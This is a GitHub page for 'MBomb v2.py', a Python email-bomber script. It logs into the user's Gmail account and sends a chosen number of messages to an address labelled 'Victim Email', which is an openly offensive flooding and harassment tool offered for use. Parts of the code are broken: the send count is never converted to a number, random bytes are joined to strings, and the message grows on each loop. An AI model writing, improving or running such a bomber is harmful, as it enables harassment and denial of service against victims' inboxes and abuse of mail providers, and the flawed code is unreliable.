-
Notifications
You must be signed in to change notification settings - Fork 53
/
MBomb v2.py
94 lines (73 loc) · 3.3 KB
/
MBomb v2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
# -*- coding: utf-8 -*-
#=========================================================================================================================================
import os
import random
import smtplib
import sys
import getpass
import time
# ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ Welcome ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
from tqdm import trange
from colorama import Fore
# Progress Bar_Loading:
color_bars =[
Fore.GREEN,
]
for color in color_bars:
for i in trange(int(7**7.5), #4e5
bar_format="{l_bar}%s{bar}%s{r_bar}" % (color, Fore.RESET)):
pass
os.system('cls')
print ('''
\033[92m
@@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@
@@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@
!@! !@! !@! !@ @!@ !@! @!@ !@! !@! !@! !@ @!@
@!! !!@ @!@ @!@!@!@ @!@ !@! @!! !!@ @!@ @!@!@!@
!@! ! !@! !!!@!!!! !@! !!! !@! ! !@! !!!@!!!!
!!: !!: !!: !!! !!: !!! !!: !!: !!: !!!
:!: :!: :!: !:! :!: !:! :!: :!: :!: !:!
::: :: :: :::: ::::: :: ::: :: :: ::::
: : :: : :: : : : : : :: : ::
©copyright by \033[93mEngine Ripper \033[97m
''')
print(" ")
#Information:
user = input('\033[92mYour \033[92mGmail\033[97m :\033[94m ')
Password = getpass.getpass('\033[92mYour \033[92mPassword\033[97m :\033[94m ')
print(" ")
sender = input('\033[91mTo Victim \033[91mEmail\033[97m : \033[94m')
message = input('\033[92mYour \033[92mMessage\033[97m : \033[94m')
print(" ")
color = input('\033[92mNumber of \033[92msend\033[97m : \033[94m')
print(" ")
print("\033[94m📮\033[92mSending : ")
# SMTP_SERVER_INFO:
smtp_server = 'smtp.gmail.com'
port = 587
#Login:
try:
server = smtplib.SMTP(smtp_server,port)
server.ehlo()
if smtp_server == "smtp.gmail.com":
server.starttls()
server.login(user,Password)
# Sending:
for i in range(1, color+1):
subject = os.urandom(9)
message = 'From: ' + user + '\nSubject: ' + subject + '\n' + message
server.sendmail(user, sender, message)
print ("\033[94m☑\033[97m Email \033[92mSENT\033[97m :\033[93m %i") % i
sys.stdout.flush()
server.quit()
print ('\033[93m☑\033[97m All \033[97mMessage was\033[92m sent\033[97m ')
except KeyboardInterrupt:
print ('[✘] Canceled')
sys.exit()
except smtplib.SMTPAuthenticationError:
print(" ")
print("\033[94m⚠️\033[91mError \033[97m:")
print ('\033[94m⚠️\033[97mThe \033[93musername \033[97mor \033[93mpassword \033[97myou entered is incorrect.')
print ("\033[94m⚠️\033[91mCheck if the Options of 'Applications are less secure' is enabled\nCheck at https://myaccount.google.com/lesssecureapps")
sys.exit()